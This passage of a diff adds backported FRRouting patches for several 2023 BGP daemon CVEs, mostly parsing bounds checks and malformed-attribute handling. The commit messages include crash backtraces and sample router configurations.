trust the length value specified in the nlri. +Always ensure that the amount of data we need to read +can be fullfilled. + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donald Sharp <sharpd@nvidia.com> + +CVE: CVE-2023-31490 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/pull/12454/commits/06431bfa7570f169637ebb5898f0b0cc3b010802] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_attr.c | 79 ++++++++++++++++--------------------------------- + 1 file changed, 25 insertions(+), 54 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 2154baf4e..5d06991e2 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -2722,9 +2722,21 @@ static bgp_attr_parse_ret_t bgp_attr_psid_sub(uint8_t type, uint16_t length, + uint8_t sid_type, sid_flags; + char buf[BUFSIZ]; + ++ /* ++ * Check that we actually have at least as much data as ++ * specified by the length field ++ */ ++ if (STREAM_READABLE(peer->curr) < length) { ++ flog_err( ++ EC_BGP_ATTR_LEN, ++ "Prefix SID specifies length %hu, but only %zu bytes remain", ++ length, STREAM_READABLE(peer->curr)); ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, ++ args->total); ++ } ++ + if (type == BGP_PREFIX_SID_LABEL_INDEX) { +- if (STREAM_READABLE(peer->curr) < length +- || length != BGP_PREFIX_SID_LABEL_INDEX_LENGTH) { ++ if (length != BGP_PREFIX_SID_LABEL_INDEX_LENGTH) { + flog_err(EC_BGP_ATTR_LEN, + "Prefix SID label index length is %hu instead of %u", + length, BGP_PREFIX_SID_LABEL_INDEX_LENGTH); +@@ -2746,12 +2758,8 @@ static bgp_attr_parse_ret_t bgp_attr_psid_sub(uint8_t type, uint16_t length, + /* Store label index; subsequently, we'll check on + * address-family */ + attr->label_index = label_index; +- } +- +- /* Placeholder code for the IPv6 SID type */ +- else if (type == BGP_PREFIX_SID_IPV6) { +- if (STREAM_READABLE(peer->curr) < length +- || length != BGP_PREFIX_SID_IPV6_LENGTH) { ++ } else if (type == BGP_PREFIX_SID_IPV6) { ++ if (length != BGP_PREFIX_SID_IPV6_LENGTH) { + flog_err(EC_BGP_ATTR_LEN, + "Prefix SID IPv6 length is %hu instead of %u", + length, BGP_PREFIX_SID_IPV6_LENGTH); +@@ -2765,10 +2773,7 @@ static bgp_attr_parse_ret_t bgp_attr_psid_sub(uint8_t type, uint16_t length, + stream_getw(peer->curr); + + stream_get(&ipv6_sid, peer->curr, 16); +- } +- +- /* Placeholder code for the Originator SRGB type */ +- else if (type == BGP_PREFIX_SID_ORIGINATOR_SRGB) { ++ } else if (type == BGP_PREFIX_SID_ORIGINATOR_SRGB) { + /* + * ietf-idr-bgp-prefix-sid-05: + * Length is the total length of the value portion of the +@@ -2793,19 +2798,6 @@ static bgp_attr_parse_ret_t bgp_attr_psid_sub(uint8_t type, uint16_t length, + args->total); + } + +- /* +- * Check that we actually have at least as much data as +- * specified by the length field +- */ +- if (STREAM_READABLE(peer->curr) < length) { +- flog_err(EC_BGP_ATTR_LEN, +- "Prefix SID Originator SRGB specifies length %hu, but only %zu bytes remain", +- length, STREAM_READABLE(peer->curr)); +- return bgp_attr_malformed( +- args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, +- args->total); +- } +- + /* + * Check that the portion of the TLV containing the sequence of + * SRGBs corresponds to a multiple of the SRGB size; to get +@@ -2829,12 +2821,8 @@ static bgp_attr_parse_ret_t bgp_attr_psid_sub(uint8_t type, uint16_t length, + stream_get(&srgb_base, peer->curr, 3); + stream_get(&srgb_range, peer->curr, 3); + } +- } +- +- /* Placeholder code for the VPN-SID Service type */ +- else if (type == BGP_PREFIX_SID_VPN_SID) { +- if (STREAM_READABLE(peer->curr) < length +- || length != BGP_PREFIX_SID_VPN_SID_LENGTH) { ++ } else if (type == BGP_PREFIX_SID_VPN_SID) { ++ if (length != BGP_PREFIX_SID_VPN_SID_LENGTH) { + flog_err(EC_BGP_ATTR_LEN, + "Prefix SID VPN SID length is %hu instead of %u", + length, BGP_PREFIX_SID_VPN_SID_LENGTH); +@@ -2870,39 +2858,22 @@ static bgp_attr_parse_ret_t bgp_attr_psid_sub(uint8_t type, uint16_t length, + attr->srv6_vpn->sid_flags = sid_flags; + sid_copy(&attr->srv6_vpn->sid, &ipv6_sid); + attr->srv6_vpn = srv6_vpn_intern(attr->srv6_vpn); +- } +- +- /* Placeholder code for the SRv6 L3 Service type */ +- else if (type == BGP_PREFIX_SID_SRV6_L3_SERVICE) { +- if (STREAM_READABLE(peer->curr) < length) { ++ } else if (type == BGP_PREFIX_SID_SRV6_L3_SERVICE) { ++ if (STREAM_READABLE(peer->curr) < 1) { + flog_err( + EC_BGP_ATTR_LEN, +- "Prefix SID SRv6 L3-Service length is %hu, but only %zu bytes remain", +- length, STREAM_READABLE(peer->curr)); +- return bgp_attr_malformed(args, +- BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, +- args->total); ++ "Prefix SID SRV6 L3 Service not enough data left, it must be at least 1 byte"); ++ return bgp_attr_malformed( ++ args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, ++ args->total); + } +- + /* ignore reserved */ + stream_getc(peer->curr); + + return bgp_attr_srv6_service(args); + } +- + /* Placeholder code for Unsupported TLV */ + else { +- +- if (STREAM_READABLE(peer->curr) < length) { +- flog_err( +- EC_BGP_ATTR_LEN, +- "Prefix SID SRv6 length is %hu - too long, only %zu remaining in this UPDATE", +- length, STREAM_READABLE(peer->curr)); +- return bgp_attr_malformed( +- args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, +- args->total); +- } +- + if (bgp_debug_update(peer, NULL, NULL, 1)) + zlog_debug( + "%s attr Prefix-SID sub-type=%u is not supported, skipped", +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-38406.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38406.patch new file mode 100644 index 0000000000..9d5f306fe4 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38406.patch @@ -0,0 +1,42 @@ +From f2a5c583fc8f7c515f3d6e6f929dcbcc61f7e4b7 Mon Sep 17 00:00:00 2001 +From: Donald Sharp <sharpd@nvidia.com> +Date: Mon, 20 Nov 2023 11:43:27 +0000 +Subject: [PATCH 1/6] bgpd: Flowspec overflow issue + +According to the flowspec RFC 8955 a flowspec nlri is <length, <nlri data>> +Specifying 0 as a length makes BGP get all warm on the inside. Which +in this case is not a good thing at all. Prevent warmth, stay cold +on the inside. + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donald Sharp <sharpd@nvidia.com> + +CVE: CVE-2023-38406 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/0b999c886e241c52bd1f7ef0066700e4b618ebb3] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_flowspec.c | 7 +++++++ + 1 file changed, 7 insertions(+) + +diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c +index 3e2b1ac49..95fbd340a 100644 +--- a/bgpd/bgp_flowspec.c ++++ b/bgpd/bgp_flowspec.c +@@ -148,6 +148,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr, + psize); + return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW; + } ++ ++ if (psize == 0) { ++ flog_err(EC_BGP_FLOWSPEC_PACKET, ++ "Flowspec NLRI length 0 which makes no sense"); ++ return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW; ++ } ++ + if (bgp_fs_nlri_validate(pnt, psize, afi) < 0) { + flog_err( + EC_BGP_FLOWSPEC_PACKET, +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-38407.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38407.patch new file mode 100644 index 0000000000..782b44615a --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38407.patch @@ -0,0 +1,63 @@ +From 3880f66bd053d1f56af74852ca57ba166d880920 Mon Sep 17 00:00:00 2001 +From: Donald Sharp <sharpd@nvidia.com> +Date: Mon, 20 Nov 2023 12:03:29 +0000 +Subject: [PATCH 2/6] bgpd: Fix use beyond end of stream of labeled unicast + parsing + +Fixes a couple crashes associated with attempting to read +beyond the end of the stream. + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donald Sharp <sharpd@nvidia.com> + +CVE: CVE-2023-38407 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/7404a914b0cafe046703c8381903a80d3def8f8b] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_label.c | 15 +++++++++++++++ + 1 file changed, 15 insertions(+) + +diff --git a/bgpd/bgp_label.c b/bgpd/bgp_label.c +index 4a20f2c09..b65c98e86 100644 +--- a/bgpd/bgp_label.c ++++ b/bgpd/bgp_label.c +@@ -299,6 +299,9 @@ static int bgp_nlri_get_labels(struct peer *peer, uint8_t *pnt, uint8_t plen, + uint8_t llen = 0; + uint8_t label_depth = 0; + ++ if (plen < BGP_LABEL_BYTES) ++ return 0; ++ + for (; data < lim; data += BGP_LABEL_BYTES) { + memcpy(label, data, BGP_LABEL_BYTES); + llen += BGP_LABEL_BYTES; +@@ -361,6 +364,9 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr, + memcpy(&addpath_id, pnt, BGP_ADDPATH_ID_LEN); + addpath_id = ntohl(addpath_id); + pnt += BGP_ADDPATH_ID_LEN; ++ ++ if (pnt >= lim) ++ return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW; + } + + /* Fetch prefix length. */ +@@ -379,6 +385,15 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr, + + /* Fill in the labels */ + llen = bgp_nlri_get_labels(peer, pnt, psize, &label); ++ if (llen == 0) { ++ flog_err( ++ EC_BGP_UPDATE_RCV, ++ "%s [Error] Update packet error (wrong label length 0)", ++ peer->host); ++ bgp_notify_send(peer, BGP_NOTIFY_UPDATE_ERR, ++ BGP_NOTIFY_UPDATE_INVAL_NETWORK); ++ return BGP_NLRI_PARSE_ERROR_LABEL_LENGTH; ++ } + p.prefixlen = prefixlen - BSIZE(llen); + + /* There needs to be at least one label */ +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-38802.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38802.patch new file mode 100644 index 0000000000..60801bf06e --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38802.patch @@ -0,0 +1,136 @@ +From ad32e04f3db364694edc678327326ae6b771db9e Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Tue, 5 Sep 2023 11:30:53 +0000 +Subject: [PATCH 1/2] bgpd: Use treat-as-withdraw for tunnel encapsulation + attribute + +Before this path we used session reset method, which is discouraged by rfc7606. + +Handle this as rfc requires. + +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> + +CVE: CVE-2023-38802 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/bcb6b58d9530173df41d3a3cbc4c600ee0b4b186] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_attr.c | 61 ++++++++++++++++++++----------------------------- + 1 file changed, 25 insertions(+), 36 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 5d06991e2..b10a60351 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -1310,6 +1310,7 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode, + case BGP_ATTR_LARGE_COMMUNITIES: + case BGP_ATTR_ORIGINATOR_ID: + case BGP_ATTR_CLUSTER_LIST: ++ case BGP_ATTR_ENCAP: + return BGP_ATTR_PARSE_WITHDRAW; + case BGP_ATTR_MP_REACH_NLRI: + case BGP_ATTR_MP_UNREACH_NLRI: +@@ -2411,26 +2412,21 @@ bgp_attr_ipv6_ext_communities(struct bgp_attr_parser_args *args) + } + + /* Parse Tunnel Encap attribute in an UPDATE */ +-static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ +- bgp_size_t length, /* IN: attr's length field */ +- struct attr *attr, /* IN: caller already allocated */ +- uint8_t flag, /* IN: attr's flags field */ +- uint8_t *startp) ++static int bgp_attr_encap(struct bgp_attr_parser_args *args) + { +- bgp_size_t total; + uint16_t tunneltype = 0; +- +- total = length + (CHECK_FLAG(flag, BGP_ATTR_FLAG_EXTLEN) ? 4 : 3); ++ struct peer *const peer = args->peer; ++ struct attr *const attr = args->attr; ++ bgp_size_t length = args->length; ++ uint8_t type = args->type; ++ uint8_t flag = args->flags; + + if (!CHECK_FLAG(flag, BGP_ATTR_FLAG_TRANS) + || !CHECK_FLAG(flag, BGP_ATTR_FLAG_OPTIONAL)) { +- zlog_info( +- "Tunnel Encap attribute flag isn't optional and transitive %d", +- flag); +- bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_ATTR_FLAG_ERR, +- startp, total); +- return -1; ++ zlog_err("Tunnel Encap attribute flag isn't optional and transitive %d", ++ flag); ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + + if (BGP_ATTR_ENCAP == type) { +@@ -2438,12 +2434,11 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ + uint16_t tlv_length; + + if (length < 4) { +- zlog_info( ++ zlog_err( + "Tunnel Encap attribute not long enough to contain outer T,L"); +- bgp_notify_send_with_data( +- peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, startp, total); +- return -1; ++ return bgp_attr_malformed(args, ++ BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + tunneltype = stream_getw(BGP_INPUT(peer)); + tlv_length = stream_getw(BGP_INPUT(peer)); +@@ -2473,13 +2468,11 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ + } + + if (sublength > length) { +- zlog_info( +- "Tunnel Encap attribute sub-tlv length %d exceeds remaining length %d", +- sublength, length); +- bgp_notify_send_with_data( +- peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, startp, total); +- return -1; ++ zlog_err("Tunnel Encap attribute sub-tlv length %d exceeds remaining length %d", ++ sublength, length); ++ return bgp_attr_malformed(args, ++ BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + + /* alloc and copy sub-tlv */ +@@ -2527,13 +2520,10 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ + + if (length) { + /* spurious leftover data */ +- zlog_info( +- "Tunnel Encap attribute length is bad: %d leftover octets", +- length); +- bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, +- startp, total); +- return -1; ++ zlog_err("Tunnel Encap attribute length is bad: %d leftover octets", ++ length); ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + + return 0; +@@ -3332,8 +3322,7 @@ bgp_attr_parse_ret_t bgp_attr_parse(struct peer *peer, struct attr *attr, + case BGP_ATTR_VNC: + #endif + case BGP_ATTR_ENCAP: +- ret = bgp_attr_encap(type, peer, length, attr, flag, +- startp); ++ ret = bgp_attr_encap(&attr_args); + break; + case BGP_ATTR_PREFIX_SID: + ret = bgp_attr_prefix_sid(&attr_args); +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-41358.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-41358.patch new file mode 100644 index 0000000000..e10d3e5267 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-41358.patch @@ -0,0 +1,105 @@ +From ef9b66e742f9016b3bf283920b528cf20d2c969f Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Tue, 5 Sep 2023 11:36:13 +0000 +Subject: [PATCH 2/2] bgpd: Do not process NLRIs if the attribute length is + zero + +``` +3 0x00007f423aa42476 in __GI_raise (sig=sig@entry=11) at ../sysdeps/posix/raise.c:26 +4 0x00007f423aef9740 in core_handler (signo=11, siginfo=0x7fffc414deb0, context=<optimized out>) at lib/sigevent.c:246 +5 <signal handler called> +6 0x0000564dea2fc71e in route_set_aspath_prepend (rule=0x564debd66d50, prefix=0x7fffc414ea30, object=0x7fffc414e400) + at bgpd/bgp_routemap.c:2258 +7 0x00007f423aeec7e0 in route_map_apply_ext (map=<optimized out>, prefix=prefix@entry=0x7fffc414ea30, + match_object=match_object@entry=0x7fffc414e400, set_object=set_object@entry=0x7fffc414e400, pref=pref@entry=0x0) at lib/routemap.c:2690 +8 0x0000564dea2d277e in bgp_input_modifier (peer=peer@entry=0x7f4238f59010, p=p@entry=0x7fffc414ea30, attr=attr@entry=0x7fffc414e770, + afi=afi@entry=AFI_IP, safi=safi@entry=SAFI_UNICAST, rmap_name=rmap_name@entry=0x0, label=0x0, num_labels=0, dest=0x564debdd5130) + at bgpd/bgp_route.c:1772 +9 0x0000564dea2df762 in bgp_update (peer=peer@entry=0x7f4238f59010, p=p@entry=0x7fffc414ea30, addpath_id=addpath_id@entry=0, + attr=0x7fffc414eb50, afi=afi@entry=AFI_IP, safi=<optimized out>, safi@entry=SAFI_UNICAST, type=9, sub_type=0, prd=0x0, label=0x0, + num_labels=0, soft_reconfig=0, evpn=0x0) at bgpd/bgp_route.c:4374 +10 0x0000564dea2e2047 in bgp_nlri_parse_ip (peer=0x7f4238f59010, attr=attr@entry=0x7fffc414eb50, packet=0x7fffc414eaf0) + at bgpd/bgp_route.c:6249 +11 0x0000564dea2c5a58 in bgp_nlri_parse (peer=peer@entry=0x7f4238f59010, attr=attr@entry=0x7fffc414eb50, + packet=packet@entry=0x7fffc414eaf0, mp_withdraw=mp_withdraw@entry=false) at bgpd/bgp_packet.c:339 +12 0x0000564dea2c5d66 in bgp_update_receive (peer=peer@entry=0x7f4238f59010, size=size@entry=109) at bgpd/bgp_packet.c:2024 +13 0x0000564dea2c901d in bgp_process_packet (thread=<optimized out>) at bgpd/bgp_packet.c:2933 +14 0x00007f423af0bf71 in event_call (thread=thread@entry=0x7fffc414ee40) at lib/event.c:1995 +15 0x00007f423aebb198 in frr_run (master=0x564deb73c670) at lib/libfrr.c:1213 +16 0x0000564dea261b83 in main (argc=<optimized out>, argv=<optimized out>) at bgpd/bgp_main.c:505 +``` + +With the configuration: + +``` +frr version 9.1-dev-MyOwnFRRVersion +frr defaults traditional +hostname ip-172-31-13-140 +log file /tmp/debug.log +log syslog +service integrated-vtysh-config +! +debug bgp keepalives +debug bgp neighbor-events +debug bgp updates in +debug bgp updates out +! +router bgp 100 + bgp router-id 9.9.9.9 + no bgp ebgp-requires-policy + bgp bestpath aigp + neighbor 172.31.2.47 remote-as 200 + ! + address-family ipv4 unicast + neighbor 172.31.2.47 default-originate + neighbor 172.31.2.47 route-map RM_IN in + exit-address-family +exit +! +route-map RM_IN permit 10 + set as-path prepend 200 +exit +! +``` + +The issue is that we try to process NLRIs even if the attribute length is 0. + +Later bgp_update() will handle route-maps and a crash occurs because all the +attributes are NULL, including aspath, where we dereference. + +According to the RFC 4271: + +A value of 0 indicates that neither the Network Layer + Reachability Information field nor the Path Attribute field is + present in this UPDATE message. + +But with a fuzzed UPDATE message this can be faked. I think it's reasonable +to skip processing NLRIs if both update_len and attribute_len are 0. + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> + +CVE: CVE-2023-41358 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/pull/14260/commits/28ccc24d38df1d51ed8a563507e5d6f6171fdd38] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_packet.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index 0166dc6a2..2fd28aae3 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -1767,7 +1767,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + /* Network Layer Reachability Information. */ + update_len = end - stream_pnt(s); + +- if (update_len) { ++ if (update_len && attribute_len) { + /* Set NLRI portion to structure. */ + nlris[NLRI_UPDATE].afi = AFI_IP; + nlris[NLRI_UPDATE].safi = SAFI_UNICAST; +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-41909.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-41909.patch new file mode 100644 index 0000000000..b27d7af166 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-41909.patch @@ -0,0 +1,42 @@ +From 5966b6a1fc72d3698d08199922cc4f42ea7fc9eb Mon Sep 17 00:00:00 2001 +From: Donald Sharp <sharpd@nvidia.com> +Date: Fri, 8 Sep 2023 11:46:12 +0000 +Subject: [PATCH] bgpd: Limit flowspec to no attribute means a implicit + withdrawal + +All other parsing functions done from bgp_nlri_parse() assume +no attributes == an implicit withdrawal. Let's move +bgp_nlri_parse_flowspec() into the same alignment. + +Reported-by: Matteo Memelli <mmemelli@amazon.it> +Signed-off-by: Donald Sharp <sharpd@nvidia.com> + +CVE: CVE-2023-41909 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/cfd04dcb3e689754a72507d086ba3b9709fc5ed8] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_flowspec.c | 7 +++++++ + 1 file changed, 7 insertions(+) + +diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c +index 341cfe9d0..3e2b1ac49 100644 +--- a/bgpd/bgp_flowspec.c ++++ b/bgpd/bgp_flowspec.c +@@ -112,6 +112,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr, + afi = packet->afi; + safi = packet->safi; + ++ /* ++ * All other AFI/SAFI's treat no attribute as a implicit ++ * withdraw. Flowspec should as well. ++ */ ++ if (!attr) ++ withdraw = 1; ++ + if (packet->length >= FLOWSPEC_NLRI_SIZELIMIT_EXTENDED) { + flog_err(EC_BGP_FLOWSPEC_PACKET, + "BGP flowspec nlri length maximum reached (%u)", +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch new file mode 100644 index 0000000000..17ba41037c --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch @@ -0,0 +1,127 @@ +From 1c4882b83a1db705abd5d384dd0b7ef4c0e3b4ee Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Mon, 20 Nov 2023 14:11:13 +0000 +Subject: [PATCH 3/6] bgpd: Handle MP_REACH_NLRI malformed packets with session + reset + +Avoid crashing bgpd. + +``` +(gdb) +bgp_mp_reach_parse (args=<optimized out>, mp_update=0x7fffffffe140) at bgpd/bgp_attr.c:2341 +2341 stream_get(&attr->mp_nexthop_global, s, IPV6_MAX_BYTELEN); +(gdb) +stream_get (dst=0x7fffffffe1ac, s=0x7ffff0006e80, size=16) at lib/stream.c:320 +320 { +(gdb) +321 STREAM_VERIFY_SANE(s); +(gdb) +323 if (STREAM_READABLE(s) < size) { +(gdb) +34 return __builtin___memcpy_chk (__dest, __src, __len, __bos0 (__dest)); +(gdb) + +Thread 1 "bgpd" received signal SIGSEGV, Segmentation fault. +0x00005555556e37be in route_set_aspath_prepend (rule=0x555555aac0d0, prefix=0x7fffffffe050, + object=0x7fffffffdb00) at bgpd/bgp_routemap.c:2282 +2282 if (path->attr->aspath->refcnt) +(gdb) +``` + +With the configuration: + +``` + neighbor 127.0.0.1 remote-as external + neighbor 127.0.0.1 passive + neighbor 127.0.0.1 ebgp-multihop + neighbor 127.0.0.1 disable-connected-check + neighbor 127.0.0.1 update-source 127.0.0.2 + neighbor 127.0.0.1 timers 3 90 + neighbor 127.0.0.1 timers connect 1 + address-family ipv4 unicast + redistribute connected + neighbor 127.0.0.1 default-originate + neighbor 127.0.0.1 route-map RM_IN in + exit-address-family +! +route-map RM_IN permit 10 + set as-path prepend 200 +exit +``` + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> + +CVE: CVE-2023-46752 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/b08afc81c60607a4f736f418f2e3eb06087f1a35] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_attr.c | 6 +----- + bgpd/bgp_attr.h | 1 - + bgpd/bgp_packet.c | 6 +----- + 3 files changed, 2 insertions(+), 11 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index b10a60351..e0542356c 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -2207,7 +2207,7 @@ int bgp_mp_reach_parse(struct bgp_attr_parser_args *args, + + mp_update->afi = afi; + mp_update->safi = safi; +- return BGP_ATTR_PARSE_EOR; ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0); + } + + mp_update->afi = afi; +@@ -3345,10 +3345,6 @@ bgp_attr_parse_ret_t bgp_attr_parse(struct peer *peer, struct attr *attr, + goto done; + } + +- if (ret == BGP_ATTR_PARSE_EOR) { +- goto done; +- } +- + if (ret == BGP_ATTR_PARSE_ERROR) { + flog_warn(EC_BGP_ATTRIBUTE_PARSE_ERROR, + "%s: Attribute %s, parse error", peer->host, +diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h +index 781bfdec3..69f962134 100644 +--- a/bgpd/bgp_attr.h ++++ b/bgpd/bgp_attr.h +@@ -378,7 +378,6 @@ typedef enum { + /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR + */ + BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3, +- BGP_ATTR_PARSE_EOR = -4, + } bgp_attr_parse_ret_t; + + struct bpacket_attr_vec_arr; +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index 2fd28aae3..261695198 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -1843,8 +1843,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + * Non-MP IPv4/Unicast EoR is a completely empty UPDATE + * and MP EoR should have only an empty MP_UNREACH + */ +- if ((!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) +- || (attr_parse_ret == BGP_ATTR_PARSE_EOR)) { ++ if (!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) { + afi_t afi = 0; + safi_t safi; + struct graceful_restart_info *gr_info; +@@ -1865,9 +1864,6 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + && nlris[NLRI_MP_WITHDRAW].length == 0) { + afi = nlris[NLRI_MP_WITHDRAW].afi; + safi = nlris[NLRI_MP_WITHDRAW].safi; +- } else if (attr_parse_ret == BGP_ATTR_PARSE_EOR) { +- afi = nlris[NLRI_MP_UPDATE].afi; +- safi = nlris[NLRI_MP_UPDATE].safi; + } + + if (afi && peer->afc[afi][safi]) { +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch new file mode 100644 index 0000000000..855eb190db --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch @@ -0,0 +1,119 @@ +From 60bd794a9cf6df05503a062e113161dcbdbfac9d Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Mon, 20 Nov 2023 14:22:22 +0000 +Subject: [PATCH 4/6] bgpd: Check mandatory attributes more carefully for + UPDATE message + +If we send a crafted BGP UPDATE message without mandatory attributes, we do +not check if the length of the path attributes is zero or not. We only check +if attr->flag is at least set or not. Imagine we send only unknown transit +attribute, then attr->flag is always 0. Also, this is true only if graceful-restart +capability is received. + +A crash: + +``` +bgpd[7834]: [TJ23Y-GY0RH] 127.0.0.1 Unknown attribute is received (type 31, length 16) +bgpd[7834]: [PCFFM-WMARW] 127.0.0.1(donatas-pc) rcvd UPDATE wlen 0 attrlen 20 alen 17 +BGP[7834]: Received signal 11 at 1698089639 (si_addr 0x0, PC 0x55eefd375b4a); aborting... +BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_backtrace_sigsafe+0x6d) [0x7f3205ca939d] +BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_signal+0xf3) [0x7f3205ca9593] +BGP[7834]: /usr/local/lib/libfrr.so.0(+0xf5181) [0x7f3205cdd181] +BGP[7834]: /lib/x86_64-linux-gnu/libpthread.so.0(+0x12980) [0x7f3204ff3980] +BGP[7834]: /usr/lib/frr/bgpd(+0x18ab4a) [0x55eefd375b4a] +BGP[7834]: /usr/local/lib/libfrr.so.0(route_map_apply_ext+0x310) [0x7f3205cd1290] +BGP[7834]: /usr/lib/frr/bgpd(+0x163610) [0x55eefd34e610] +BGP[7834]: /usr/lib/frr/bgpd(bgp_update+0x9a5) [0x55eefd35c1d5] +BGP[7834]: /usr/lib/frr/bgpd(bgp_nlri_parse_ip+0xb7) [0x55eefd35e867] +BGP[7834]: /usr/lib/frr/bgpd(+0x1555e6) [0x55eefd3405e6] +BGP[7834]: 